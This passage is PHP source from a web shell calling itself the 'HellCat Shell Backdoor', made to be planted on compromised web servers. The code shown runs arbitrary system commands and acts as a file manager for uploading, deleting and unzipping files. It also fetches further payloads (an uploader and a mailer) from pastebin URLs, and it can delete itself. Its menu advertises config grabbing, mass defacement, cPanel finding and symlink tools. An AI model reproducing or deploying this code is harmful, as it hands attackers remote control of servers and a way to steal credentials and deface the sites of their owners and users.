- type='submit' name='cps' class='btn-exe' onclick='saveForm();return false;' style='width:100px'><i class='fa fa-arrow-circle-right'></i></button></td></table></form></div>";
- echo '<script>function saveForm(){
- if(document.getElementById("newpass").value == ""){';
- s('Enter New Password !!');
- echo'document.getElementById("newpass").focus();
- return false;
- }
- if(document.getElementById("confirm").value == ""){';
- s('Confirm Your Password !!');
- echo'return false;
- }
- document.getElementById("sks").submit();
- }
- </script>';
- }
- elseif($_COEG['command'] == 'kill') {
- if(file_exists("hellcat_shell.php"))
- unlink("hellcat_shell.php");unlink(__FILE__);
- success('bye!');
- mtr('https://www.hellcatindonesia.net/');
- }
- elseif($_COEG['command'] == 'renadir') {
- $c = $_COEG['e'];
- if($_COEG['e']) {
- $e = rename($dir, "".dirname($dir)."/".htmlspecialchars($_COEG['e'])."");
- if($e) {
- vars('<script>c("?'.x5.dirname($dir).'");</script>');
- } else {
- error('Permission Denied !!');
- }
- }
- vars('<div class="coL-panel"><table>
- <td class="td-panel"><center><i class="fa fa-bug"></i></center></td><td class="td-panel-right">RENAME DIRECTORY</td></table></div>');
- vars("<div class='coL-option top'>
- <br><br><br>
- <center>
- <i class='fa fa-folder-o fa-3x'></i></center><br><br>");
- vars("<form action='?".x7."renadir&".x5.$dir."' style='margin:0px' method='post'>
- <table cellspacing='0'>
- <td align='center' style='width:10%'><i class='fa fa-folder-o'></i> </td><td style='width:70%'><input type='text' value='".basename($dir)."' name='e'></td><td style='width:20%'>
- <button onmousedown='bleep.play();'
- type='submit' class='btn-exe'><i class='fa fa-arrow-circle-right'></i></button></td></table>
- </form></div>");
- }
- elseif($_COEG['command'] == 'deledir') {
- $x0z1 = deledir($dir);
- if($x0z1) {
- vars("<script>window.location = '?".x5.dirname($dir)."';</script>");
- } else {
- vars("<script>window.location = '?".x5.dirname($dir)."';</script>");
- error('Permission Denied !!');
- }
- }
- elseif($_COEG['command'] == 'about') {
- echo '<div class="coL-panel"><table>
- <td class="td-panel"><center><i class="fa fa-bug"></i></center></td><td class="td-panel-right">ABOUT ME</td></table></div>';
- echo '<div class="coL-option" style="padding:7px"><br><br>
- <center><i class="fa fa-group fa-4x"></i></center><br>
- <center><font size="4px" style="shadow:2px 2px 0px #fff">HELLCAT INDONESIA</font></font><br><i class="fa fa-globe"></i> http://'.$_SERVER['HTTP_HOST'].'</center><br><br>
- </div>
- <div class="coL-panel top"><table>
- <td class="td-panel"><center><i class="fa fa-bug"></i></center></td><td class="td-panel-right">ABOUT</td></table></div>
- <table class="table-info">
- <tr class="ex-hov">
- <td style="width:85px" class="td-info"><span class="label label-default">+</span> Name</td> <td class="td-info">: HellCat Shell Backdoor</td>
- <tr class="ex-hov">
- <td style="width:85px" class="td-info"><span class="label label-default">+</span> Version</td> <td class="td-info">: 1.3 ( <font color="green">Premium Script</font> )</td>
- <tr class="ex-hov">
- <td style="width:85px" class="td-info"><span class="label label-default">+</span> Author</td> <td class="td-info">: Bartes Dwiky</td>
- <tr class="ex-hov">
- <td style="width:85px" class="td-info"><span class="label label-default">+</span> Email</td> <td class="td-info break">: <a class="a" href="mailto:hellcatindonesia@gmail.com">hellcatindonesia@gmail.com</a></td>
- <tr class="ex-hov">
- <td style="width:85px" class="td-info"><span class="label label-default">+</span> Instagram</td> <td class="td-info break">: <a class="a" href="https://www.instagram.com/hellcatindonesia">http://instagram.com/hellcatindonesia</a></td>
- <tr class="ex-hov">
- <td style="width:85px" class="td-info"><span class="label label-default">+</span> Blog</td> <td class="td-info">: <a class="a" href="https://www.hellcatindonesia.net">http://hellcatindonesia.net/</a></td></table>
- <div class="coL-option">
- <center><br>Jika ada kesalahan atau ada bug pada shell backdoor kami, Silahkan contact email kami di atas.<br><br><center><br>— Thanks All —</center></div>';
- }
- elseif($_COEG['command'] == 'upload') {
- vars('<style> .tup { font-size: 14px; } </style>');
- echo '<div class="coL-panel"><table>
- <td class="td-panel"><center><i class="fa fa-bug"></i></center></td><td class="td-panel-right">MULTIPLE UPLOAD</td></table></div>';
- if(isset($_REQUEST['ufile'])) {
- $ufile = $_COEG['ufile'] ;
- }
- if(isset($_REQUEST['upload'])) {
- if($_COEG['upload']){
- if(empty($ufile)) {
- $cx = $_FILES['file']['name'];
- } else {
- $cx = $ufile;
- }
- if(@copy($_FILES['file']['tmp_name'],$dir.'/'.$cx)) {
- success('File Uploaded !!');
- } else {
- error('Upload Failed !!');
- } } }
- vars('<script language="Javascript">
- function cogx(){
- if(document.forms[\'upload\'].file.value === "") {');
- s('Select Your File !!');
- vars('return false;
- }
- }
- </script>');
- echo '<div class="coL-option"><span class="label-default">+</span> Upload From Device :<hr>';
- echo '<form enctype="multipart/form-data" name="upload" action="?'.x7.'upload&'.x5.$dir.'" method="POST" style="margin:0px">
- <table style="width:100%">
- <td class="tup" style="width:20%">File :</td>
- <td style="width:80%">
- <input onmousedown="bleep.play();"
- type="file" name="file"></td>
- <tr>
- <td class="tup" style="width:20%">Name :</td>
- <td style="width:80%"><input name="ufile" type="text" placeholder="( Optional )" value="" /></td>
- <tr>
- <td style="width:20%"></td>
- <td style="width:80%"><input onmousedown="bleep.play();"
- type="submit" name="upload" style="width:100px" onclick="return cogx();" value="Upload" class="btn-exe" />
- </td></table></form></div>';
- if($_COEG["submit"]){
- $url = trim($_COEG["url"]);
- $uname = $_COEG["uname"];
- if(empty($uname)) {
- $uname = basename($url);
- } else {
- $uname = $_COEG["uname"];
- }
- if(op($uname, $url)) {
- success('File Uploaded !!');
- } else {
- error('Failed !!');
- }
- }
- vars('<script language="Javascript">
- function cog(){
- if(document.forms[\'import\'].url.value === "") {');
- s('Enter URL !!');
- vars('return false;
- }
- }
- </script>');
- echo '<div class="coL-option top"><span class="label-default">+</span> Upload From Internet (Import) :<hr>';
- echo '<form name="import" action="?'.x7.'upload&'.x5.$dir.'" method="POST">';
- echo '<table style="width:100%">
- <td class="tup" style="width:20%">Link :</td>
- <td style="width:80%"><input type="text" name="url" placeholder="https://pastebin.com/raw/M4bJJtBD" style="width:100%"></td>
- <tr>
- <td class="tup" style="width:20%">Name :</td>
- <td style="width:80%"><input type="text" name="uname" style="width:100%" placeholder="( Optional )"></td>
- <tr>
- <td style="width:20%"></td><td style="width:80%"><input type="submit" name="submit" style="width:100px" value="Upload" onclick="return cog();" class="btn-exe"></td></table></form></div>';
- }
- elseif ($_COEG['command'] == 'system') {
- function exe($ms_x) {
- if(function_exists('system')) {
- @ob_start();
- @system($ms_x);
- $ms_z = @ob_get_contents();
- @ob_end_clean();
- return $ms_z;
- } elseif(function_exists('exec')) {
- @exec($ms_x,$values);
- $ms_z = "";
- foreach($values as $value) {
- $ms_z .= $result;
- } return $ms_z;
- } elseif(function_exists('passthru')) {
- @ob_start();
- @passthru($ms_x);
- $ms_z = @ob_get_contents();
- @ob_end_clean();
- return $ms_z;
- } elseif(function_exists('shell_exec')) {
- $ms_z = @shell_exec($ms_x);
- return $ms_z;
- }
- }
- function disk($dz) {
- if($dz >= 1073741824)
- return sprintf('%1.2f',$dz / 1073741824 ).' GB';
- elseif($dz >= 1048576)
- return sprintf('%1.2f',$dz / 1048576 ) .' MB';
- elseif($dz >= 1024)
- return sprintf('%1.2f',$dz / 1024 ) .' KB';
- else
- return $dz .' B';
- }
- function fuck($b_ms, $c_ms, $d_ms){
- if(strpos($b_ms, $c_ms) === FALSE) return FALSE;
- if(strpos($b_ms, $d_ms) === FALSE) return FALSE;
- $a_ms = strpos($b_ms, $c_ms) + strlen($c_ms);
- $e_ms = strpos($b_ms, $d_ms, $a_ms);
- $f_ms = substr($b_ms, $a_ms, $e_ms - $a_ms);
- return $f_ms; }
- if(get_magic_quotes_gpc()) {
- function m_ms($n_ms) {
- return is_array($n_ms) ? array_map('m_ms', $n_ms) : stripslashes($n_ms); }
- $_COEG = m_ms($_COEG); }
- $safemode = (@ini_get(strtolower("safe_mode")) == 'on') ? "<span class='label label-success'>ON</span>" : "<span class='label label-danger'>OFF</span>";
- $disablefunc = @ini_get("disable_functions");
- $mysql = (function_exists('mysql_connect')) ? "<span class='label label-success'>ON</span>" : "<span class='label label-danger'>OFF</span>";
- $curl = (function_exists('curl_version')) ? "<span class='label label-success'>ON</span>" : "<span class='label label-danger'>OFF</font>";
- $wget = (exe('wget --help')) ? "<span class='label label-success'>ON</span>" : "<span class='label label-danger'>OFF</span>";
- $perl = (exe('perl --help')) ? "<span class='label label-success'>ON</span>" : "<span class='label label-danger'>OFF</font>";
- $python = (exe('python --help')) ? "
- <span class='label label-success'>ON</span>" : "<span class='label label-danger'>OFF</span>";
- $ds_men = (!empty($disablefunc)) ? "<span class='label-danger'>".$disablefunc."</span>" : "<span class='label-success'>NONE</span>";
- if(!function_exists('posix_getegid')) {
- $c_us = @get_current_user();
- $c_id = @getmyuid();
- $g_c = @getmygid();
- $gr_p = "?";
- } else {
- $c_id = @posix_getpwuid(posix_geteuid());
- $g_c = @posix_getgrgid(posix_getegid());
- $c_us = $c_id['name'];
- $c_id = $c_id['uid'];
- $gr_p = $g_c['name'];
- $g_c = $g_c['gid'];
- }
- echo '<div class="coL-panel"><table>
- <td class="td-panel"><center><i class="fa fa-bug"></i></center></td><td class="td-panel-right">SYSTEM INFORMATION</td></table></div>';
- echo "<table width=100% class='table-info' cellspacing=0>
- <th class=th-info style=width:120px><center>Component</center></th>
- <th class=th-info><center>Arrow</center></th>
- <th class=th-info break><center>Result</center></th></tr>";
- echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span> Server </td><td class='td-info' align='center'>»</td>
- <td class='td-info'> ".$_SERVER['SERVER_SOFTWARE']."</td></tr>";
- echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span>
- Username</td><td class='td-info' align='center'>»</td>
- <td class='td-info'> ".$c_us." [".$c_id."]</td></tr>";
- echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span>
- Group</td><td class='td-info' align='center'>»</td>
- <td class='td-info'>".$gr_p." [".$g_c."]</td></tr>";
- echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span>
- Server IP </td><td class='td-info' align='center'>»</td>
- <td class='td-info'>".gethostbyname($_SERVER['HTTP_HOST'])."</td></tr>";
- echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span>
- Your IP </td><td class='td-info' align='center'>»</td>
- <td class='td-info'> ".$_SERVER['REMOTE_ADDR']."</td></tr>";
- echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span>
- PHP Version</td><td class='td-info' align='center'>»</td>
- <td class='td-info'> ".@phpversion()."</td></tr>";
- echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span> Disk Space</td> <td class='td-info' align='center'>»</td>
- <td class='td-info'>[".disk(disk_free_space("/"))."] / [".disk(disk_total_space("/"))."]</td></tr>";
- echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span> Safe Mode</td><td class='td-info' align='center'>»</td>
- <td class='td-info'> $safemode</td></tr>";
- echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span> MySQL</td><td class='td-info' align='center'>»</td><td class='td-info'>$mysql</td></tr>";
- echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span>
- Perl</td><td class='td-info' align='center'>»</td>
- <td class='td-info'> $perl </td></tr>";
- echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span> Python</td><td class='td-info' align='center'>»</td>
- <td class='td-info'>$python</td></tr>";
- echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span> WGET</td><td class='td-info' align='center'>»</td>
- <td class='td-info'>$wget</td></tr>";
- echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span> CURL</td><td class='td-info' align='center'>»</td><td class='td-info'>$curl</td></tr>";
- if(get_magic_quotes_gpc() == "1" or get_magic_quotes_gpc() == "on") {
- echo "<tr class='ex-hov'><td align='left' class='td-info'><span class='label label-default'>+</span> Magic Quotes </td><td class='td-info' align='center'>»</td>
- <td><span class='label label-success'>ON</span></tr>"; } else { echo "<tr class='ex-hov'><td align='left' class='td-info'><span class='label label-default'>+</span> Magic Quotes </td><td class='td-info' align='center'>»</td><td class='td-info'><span class='label label-danger'>OFF</span></td></tr>"; }
- echo "</table>";
- echo '<div class="coL-panel top"><table>
- <td class="td-panel"><center><i class="fa fa-bug"></i></center></td><td class="td-panel-right">KERNEL</td></table></div>';
- echo "<div class ='coL-option' style='margin-bottom:3px;padding:7px'>".php_uname()."</div>";
- echo '<div class="coL-panel top"><table>
- <td class="td-panel"><center><i class="fa fa-bug"></i></center></td><td class="td-panel-right">DISABLE FUNCTION</td></table></div>';
- echo "<div class='coL-option wrap break' style='padding:7px'>".$ds_men."</div>";
- }
- elseif($_COEG['command'] == 'error') {
- echo '<div class="coL-panel"><table>
- <td class="td-panel"><center><i class="fa fa-bug"></i></center></td><td class="td-panel-right">FILE MANAGER</td></table></div>';
- error('Permission Denied !!');
- echo x9;
- } else {
- $hc = @getcwd();
- if(isset($_COEG['location']))
- @chdir($_COEG['location']);
- $cwd = @getcwd();
- if($os == 'win') {
- $hc = str_replace("\\", "/", $hc);
- $cwd = str_replace("\\", "/", $cwd);
- }
- if($cwd[strlen($cwd)-1] != '/')
- $cwd .= '/';
- function hs($d) {
- if(function_exists("scandir")) {
- return scandir($d);
- } else {
- $dh = opendir($d);
- while (false !== ($filename = readdir($dh)))
- $data[] = $filename;
- return $data;
- }
- }
- if(!empty($_COOKIE['msv5']))
- $_COOKIE['msv5'] = @unserialize($_COOKIE['msv5']);
- if(!empty($_COEG['hcx'])) {
- switch($_COEG['hcx']) {
- case 'mkdir':
- if(!@mkdir($_COEG['p2']))
- echo "Can't create new dir";
- break;
- case 'delete':
- function deleteDir($path) {
- $path = (substr($path,-1)=='/') ? $path:$path.'/';
- $dh = opendir($path);
- while ( ($â–Ÿ = readdir($dh) ) !== false) {
- $â–Ÿ = $path.$â–Ÿ;
- if ( (basename($â–Ÿ) == "..") || (basename($â–Ÿ) == ".") )
- continue;
- $type = filetype($â–Ÿ);
- if ($type == "dir")
- deleteDir($â–Ÿ);
- else
- @unlink($â–Ÿ);
- }
- closedir($dh);
- @rmdir($path);
- }
- if(is_array(@$_COEG['msv5']))
- foreach($_COEG['msv5'] as $f) {
- if($f == '..')
- continue;
- $f = urldecode($f);
- if(is_dir($f))
- deleteDir($f);
- else
- @unlink($f);
- }
- break;
- case 'paste':
- if($_COOKIE['act'] == 'copy') {
- function copy_paste($c,$s,$d){
- if(is_dir($c.$s)){
- mkdir($d.$s);
- $h = @opendir($c.$s);
- while (($f = @readdir($h)) !== false)
- if (($f != ".") and ($f != ".."))
- copy_paste($c.$s.'/',$f, $d.$s.'/');
- } elseif(is_file($c.$s))
- @copy($c.$s, $d.$s);
- }
- foreach($_COOKIE['msv5'] as $f)
- copy_paste($_COOKIE['location'],$f, $GLOBALS['cwd']);
- } elseif($_COOKIE['act'] == 'move') {
- function move_paste($c,$s,$d){
- if(is_dir($c.$s)){
- mkdir($d.$s);
- $h = @opendir($c.$s);
- while (($f = @readdir($h)) !== false)
- if (($f != ".") and ($f != ".."))
- copy_paste($c.$s.'/',$f, $d.$s.'/');
- } elseif(@is_file($c.$s))
- @copy($c.$s, $d.$s);
- }
- foreach($_COOKIE['msv5'] as $f)
- @rename($_COOKIE['location'].$f, $GLOBALS['cwd'].$f);
- } elseif($_COOKIE['act'] == 'zip') {
- if(class_exists('ZipArchive')) {
- $zip = new ZipArchive();
- if ($zip->open($_COEG['p2'], 1)) {
- chdir($_COOKIE['location']);
- foreach($_COOKIE['msv5'] as $f) {
- if($f == '..')
- continue;
- if(@is_file($_COOKIE['location'].$f))
- $zip->addFile($_COOKIE['location'].$f, $f);
- elseif(@is_dir($_COOKIE['location'].$f)) {
- $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/', FilesystemIterator::SKIP_DOTS));
- foreach ($iterator as $key=>$value) {
- $zip->addFile(realpath($key), $key);
- }
- }
- }
- chdir($GLOBALS['cwd']);
- $zip->close();
- }
- }
- } elseif($_COOKIE['act'] == 'unzip') {
- if(class_exists('ZipArchive')) {
- $zip = new ZipArchive();
- foreach($_COOKIE['msv5'] as $f) {
- if($zip->open($_COOKIE['location'].$f)) {
- $zip->extractTo($GLOBALS['cwd']);
- $zip->close();
- }
- }
- }
- } elseif($_COOKIE['act'] == 'tar') {
- chdir($_COOKIE['location']);
- $_COOKIE['msv5'] = array_map('escapeshellarg', $_COOKIE['msv5']);
- ex('tar cfzv ' . escapeshellarg($_COEG['p2']) . ' ' . implode(' ', $_COOKIE['msv5']));
- chdir($GLOBALS['cwd']);
- }
- unset($_COOKIE['msv5']);
- setcookie('msv5', '', time() - 3600);
- break;
- default:
- if(!empty($_COEG['hcx'])) {
- vb('act', $_COEG['hcx']);
- vb('msv5', serialize(@$_COEG['msv5']));
- vb('location', @$_COEG['location']);
- }
- break;
- }
- }
- vars('<script>function m1s(){
- if(document.getElementById("act").value == ""){');
- s('Select Action !!');
- vars(' return false;
- }
- document.getElementById("sks").submit();
- }
- </script>');
- vars('<form name="data" action="?dir='.$dir.'" method="POST" style="margin:0px">');
- vars('<div class="coL-panel"><table>
- <td class="td-panel"><center><i class="fa fa-newspaper-o"></i></center></td><td class="td-panel-right"><marquee>Hellcat Indonesia Shell Backdoor - Version 1.3</marquee></td></table></div>');
- $dirContent = hs(isset($_COEG['location'])?$_COEG['location']:$GLOBALS['cwd']);
- if($dirContent === false) {
- vars('<script>c("?'.x7.'error&'.x5.$dir.'");</script>');
- return;
- }
- global $sort;
- $sort = array('name', 1);
- if(!empty($_COEG['hcx'])) {
- if(preg_match('!s_([A-z]+)_(\d{1})!', $_COEG['hcx'], $match))
- $sort = array($match[1], (int)$match[2]);
- }
- vars('<script language="JavaScript">
- function toggle(source) {
- checkboxes = document.getElementsByName("msv5[]");
- for(var i=0, n=checkboxes.length;i<n;i++) {
- checkboxes[i].checked = source.checked;
- }
- }
- </script>');
- vars('<table class="table-file" cellspacing="0">
- <th class="th-file">Name</th>
- <th class="th-file" style="width:80px">Size</th>
- <th class="th-file" style="width:65px">Action</th>
- <th class="th-file"></th>
- <tr>');
- $dir = getcwd();
- $scn = scandir($dir);
- foreach($scn as $dirx) {
- $dtype = filetype("$dir/$dirx");
- if(!is_dir("$dir/$dirx")) continue;
- if($dirx === '..') {
- $href = '<a class="a" onclick=\'c("?'.x5.dirname($dir).'")\'>'.$dirx.'</a>';
- }
- elseif($dirx === '.') {
- $href = '<a class="a" onclick=\'c("?'.x5.$dir.'")\'>'.$dirx.'</a>';
- } else {
- $href = '<a class="a" onclick=\'c("?dir='.$dir.'/'.$dirx.'")\'>'.$dirx.'</a>';
- }
- if($dirx === '.' || $dirx === '..') {
- $d_zx = "<font color='#ddd'>--</font>";
- $ckh = '<input type="checkbox" disabled>';
- } else {
- $d_zx = '<a class="a" onclick=\'c("?'.x7.'upload&'.x5.$dir.'/'.$dirx.'")\'>U</a> |
- <a class="a" onclick=\'c("?'.x7.'renadir&'.x5.$dir.'/'.$dirx.'")\'>R</a> | <a class="a" onclick=\'c("?'.x7.'deledir&'.x5.$dir.'/'.$dirx.'")\'>D</a>';
- $ckh = '<input type="checkbox" value="'.basename($dirx).'" name="msv5[]">';
- }
- echo "<tr class='ex-hov'>";
- echo "<td class='td-file break'><i class='fa fa-folder-o'></i> [ $href
- ]</td>";
- echo "<td align='center' class='td-file'><center>--</center></th>";
- echo "<td align='center' class='td-file'>$d_zx</td>";
- echo "<td align='center' class='td-file' style='width:10px'>".$ckh."</td>";
- }
- echo "</tr>";
- foreach($scn as $file) {
- $ftype = filetype("$dir/$file");
- $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
- $size = filesize("$dir/$file")/1024;
- $size = round($size,3);
- if($size > 1024) {
- $size = round($size/1024,2). 'MB';
- } else {
- $size = $size. 'KB';
- }
- if(!is_file("$dir/$file")) continue;
- echo "<tr class='ex-hov'>";
- echo '<td class=\'td-file break\'><i class="fa fa-file-o"></i> <a class="a" onclick="c(\'?'.x7.'view&'.x5.$dir.'&'.x6.$dir.'/'.$file.'\')">'.$file.'</a></td>';
- echo "<td align='center' class='td-file'>$size</td>";
- echo "<td align='center' class='td-file'>";
- echo '<a class="a" onclick=\'c("?'.x7.'edit&'.x5.$dir.'&'.x6.$dir.'/'.$file.'")\'>OPEN</a></td>';
- vars("<td align='center' class='td-file' style='width:10px'><input type='checkbox' name='msv5[]' value='".$file."'> </td>");
- }
- vars("</table><table style='width:100%;margin-top:2px' cellspacing='0'>
- <td style='width:10%;text-align:left;padding-left:7px'><input type=checkbox onClick=toggle(this)></td>
- <input type=hidden name=ne value=''>
- <input type=hidden name=location value='" . htmlspecialchars($GLOBALS['cwd']) . "'>
- <input type=hidden name=charset value='". (isset($_COEG['charset'])?$_COEG['charset']:'')."'>
- <td style='width:70%'><select name='hcx' style='width:100%' id='act'>");
- if(!empty($_COOKIE['act']) && @count($_COOKIE['msv5']))
- vars("<option value='paste'>Paste</option>");
- vars("<option value=''>-- OPTIONS --</option><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>");
- if(class_exists('ZipArchive'))
- vars("<option value='zip'>Compress (.zip)</option>");
- vars("</select></td>");
- if(!empty($_COOKIE['act']) && @count($_COOKIE['msv5']) && (($_COOKIE['act'] == 'zip') || ($_COOKIE['act'] == 'tar')))
- vars("<input class='top' type=text name=p2 value='".rand(0,100)."-" . date("Y-m-d") . "." . ($_COOKIE['act'] == 'zip'?'zip':'tar.gz') . "'>");
- vars("<td style='width:20%;text-align:right'><button onmousedown='bleep.play();'
- type='submit' onclick='m1s(); return false;' class='btn-exe'><i class='fa fa-arrow-circle-right'></i></button></td></form></table>");
- if(isset($_COEG['ndir'])) {
- $cdir = $_COEG['newinput'];
- if (is_dir($dir.'/'.$cdir)) {
- error('Directory Already Exist !!');
- } else {
- if(mkdir($dir.'/'.$cdir, 0777)) {
- vars('<script>c("?'.x5.$dir.'");</script>');;
- } else {
- error('Can\'t Create Directory !!'); } } }
- if(isset($_COEG['nfil'])) {
- $cfile = $_COEG['newinput'];
- if (file_exists($dir.'/'.$cfile)) {
- error('File Already Exist !!');
- } else {
- if(fopen($dir.'/'.$cfile, "w+")) {
- vars('<script>c("?'.x7.'edit&'.x5.$dir.'&'.x6.$dir.'/'.$cfile.'");</script>');
- } else {
- error('Can\'t Create File !!');
- }
- }
- }
- vars('<script language="Javascript">
- function cog(){
- if(document.forms[\'new\'].newinput.value === "") {');
- s('Can\'t Be Empty !!');
- vars('return false;
- }
- }
- </script>');
- vars('<script type="text/javascript">
- function valid(field) {
- var re = /^[0-9-A-z.]*$/;
- if (!re.test(field.value)) {');
- s('Invalid Name !!');
- vars('field.value = field.value.replace(/[^0-9-A-z.]/g,"");
- }
- }
- </script>');
- vars('<table style="margin-top:3px" cellspacing="0"><form name="new" action="?'.x5.$dir.'" method="post">
- <td>
- <input type="text" name="newinput" placeholder="Create" onkeyup="valid(this);"></td>
- <td><button onmousedown="bleep.play();"
- type="submit" class="btn-exe" name="ndir" onclick="return cog();"><i class="fa fa-folder-open"></i></button></td>
- <td><button onmousedown="bleep.play();"
- type="submit" class="btn-exe" name="nfil" onclick="return cog();"><i class="fa fa-file-code-o"></i></button></td></form></table>');
- }
- vars('<hr></div>');
- vars('<div class="coR">
- <div class="coR-panel"><table>
- <td class="td-panel"><center><i class="fa fa-chevron-circle-down"></i></center></td><td class="td-panel-right">MENU</td></table></div><div class="tools-content">');
- $path = getcwd();
- if(isset($_FILES['data'])) {
- if(copy($_FILES['data']['tmp_name'],$path.'/'.$_FILES['data']['name'])) {
- success('File Uploaded !!');
- mtr('?'.x5.$dir);
- } else {
- error('Upload Failed !!');
- }
- }
- echo '<script>function upload(){
- if(document.getElementById("up").value == ""){';
- s('Select Your File !!');
- vars('return false;
- }
- document.getElementById("%").submit();
- }
- </script>');
- vars('<table><td align="center" valign="top" style="width:10%;padding-top:9px"><i class="fa fa-upload"></i></td>
- <td style="width:70%"><form enctype="multipart/form-data" action="?'.x5.$dir.'" method="POST"><input type="file" name="data" id="up"></td>
- <td style="width:20%"><button onmousedown="bleep.play();"
- type="submit" class="btn-exe" onclick="upload();return false;"><i class="fa fa-arrow-circle-right"></i></button></form></td>
- </table>');
- if(isset($_COEG['x'])) {
- $rse = $_COEG['file_name'];
- $zip = new ZipArchive ;
- if($zip ->open($path.'/'.$rse) === TRUE) {
- $zip ->extractTo($path);
- $zip ->close();
- success('[ '.$rse.' ] Extracted !!');
- mtr('?'.x5.$dir);
- } else {
- error('Permission Denied !!');
- }
- }
- vars('<script>function unzip(){
- if(document.getElementById("u").value == ""){');
- s('Select File [.zip] !!');
- vars('return false;
- }
- document.getElementById("sks").submit();
- }
- </script>');
- echo '<hr><table>
- <form method="POST" action="?'.x5.$dir.'">
- <td align="center" style="width:10%"><i class="fa fa-file-archive-o"></i></td>
- <td style="width:70%"><select name="file_name" id="u">
- <option value=""> -- Choose Zip File --</option>';
- $scandir = scandir($path);
- foreach($scandir as $file){
- if(!is_file("$path/$file")) continue;
- if(preg_match('/\.zip$/mis',$file)) {
- echo '<option>'.$file.'</option>';
- }
- }
- echo '</select></td><td style="width:20%;text-align:right"><button onmousedown="bleep.play();"
- type="submit" name="x" class="btn-exe" onclick="unzip();return false;"><i class="fa fa-arrow-circle-right"></i></button></form></td></table>';
- vars('</div>');
- vars('<div class="coR-panel top"><table>
- <td class="td-panel"><center><i class="fa fa-cogs"></i></center></td><td class="td-panel-right">TOOLS : <font color="green">10</font></td></table></div>
- <div class="tools-content">');
- vars('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i></td><td class="td-tools-content">System Information</td><td class="td-tools-icon"><a onclick=\'c("?'.x7.'system&'.x5.$dir.'")\'><button onmousedown="bleep.play();"
- class="btn-exe"><i class="fa fa-arrow-circle-right"></i></button></a></td></table>');
- vars('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i></td><td class="td-tools-content">Multiple Upload</td><td class="td-tools-icon"><a onclick=\'c("?'.x7.'upload&'.x5.$dir.'")\'><button onmousedown="bleep.play();"
- class="btn-exe"><i class="fa fa-arrow-circle-right"></i></button></a></td></table>');
- vars('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i></td><td class="td-tools-content">Jumping Server</td><td class="td-tools-icon"><a onclick=\'c("?'.x7.'jumping&'.x5.$dir.'")\'><button onmousedown="bleep.play();"
- class="btn-exe"><i class="fa fa-arrow-circle-right"></i></button></a></td></table>');
- vars('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i></td><td class="td-tools-content">Config Grabber</td><td class="td-tools-icon"><a onclick=\'c("?'.x7.'config&'.x5.$dir.'")\'><button onmousedown="bleep.play();"
- class="btn-exe"><i class="fa fa-arrow-circle-right"></i></button></a></td></table>');
- vars('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i></td><td class="td-tools-content">Cookies Manager</td><td class="td-tools-icon"><a onclick=\'c("?'.x7.'cookie&'.x5.$dir.'")\'><button onmousedown="bleep.play();"
- class="btn-exe"><i class="fa fa-arrow-circle-right"></i></button></a></td></table>');
- vars('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i></td><td class="td-tools-content">Cpanel Finder</td><td class="td-tools-icon"><a onclick=\'c("?'.x7.'cpanel&'.x5.$dir.'")\'><button onmousedown="bleep.play();"
- class="btn-exe"><i class="fa fa-arrow-circle-right"></i></button></a></td></table>');
- vars('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i></td><td class="td-tools-content">Mass Deface</td><td class="td-tools-icon"><a onclick=\'c("?'.x7.'massdef&'.x5.$dir.'")\'><button onmousedown="bleep.play();"
- class="btn-exe"><i class="fa fa-arrow-circle-right"></i></button></a></td></table>');
- vars('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i></td><td class="td-tools-content">Multi Hash</td><td class="td-tools-icon"><a onclick=\'c("?'.x7.'multihash&'.x5.$dir.'")\'><button onmousedown="bleep.play();"
- class="btn-exe"><i class="fa fa-arrow-circle-right"></i></button></a></td></table>');
- vars('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i></td><td class="td-tools-content">Multi Symlink</td><td class="td-tools-icon"><a onclick=\'c("?'.x7.'symlink&'.x5.$dir.'")\'><button onmousedown="bleep.play();"
- class="btn-exe"><i class="fa fa-arrow-circle-right"></i></button></a></td></table>');
- vars('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i></td><td class="td-tools-content">Change Password</td><td class="td-tools-icon"><a onclick=\'c("?'.x7.'change&'.x5.$dir.'")\'><button onmousedown="bleep.play();"
- class="btn-exe"><i class="fa fa-arrow-circle-right"></i></button></a></td></table>');
- vars('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i></td><td class="td-tools-content">Access [ <font color="1D9D73">'.str_replace('/', '', basename($_SERVER['PHP_SELF'])).' </font> ]</td><td class="td-tools-icon"><a onclick=\'c("?'.x7.'kill&'.x5.$dir.'")\'><button onmousedown="bleep.play();" class="btn-exe"><i class="fa fa-trash"></i></button></a></td></table></div>');
- // --- Create File --- //
- vars('<script>function create(){
- if(document.getElementById("c").value == ""){');
- s('Select Action !!');
- vars('return false;
- }
- document.getElementById("sks").submit();
- }
- </script>');
- if($_COEG['op']=="1") {
- if(op('uploader.php', 'https://pastebin.com/raw/8WtSVk6k')) {
- success('Done !!');
- mtr('?'.x5.$dir);
- } else {
- error('Failed !!');
- }
- }
- if($_COEG['op']=="2") {
- if(op('mailler.php', 'https://pastebin.com/raw/TPtpvxZt')) {
- success('Done !!');
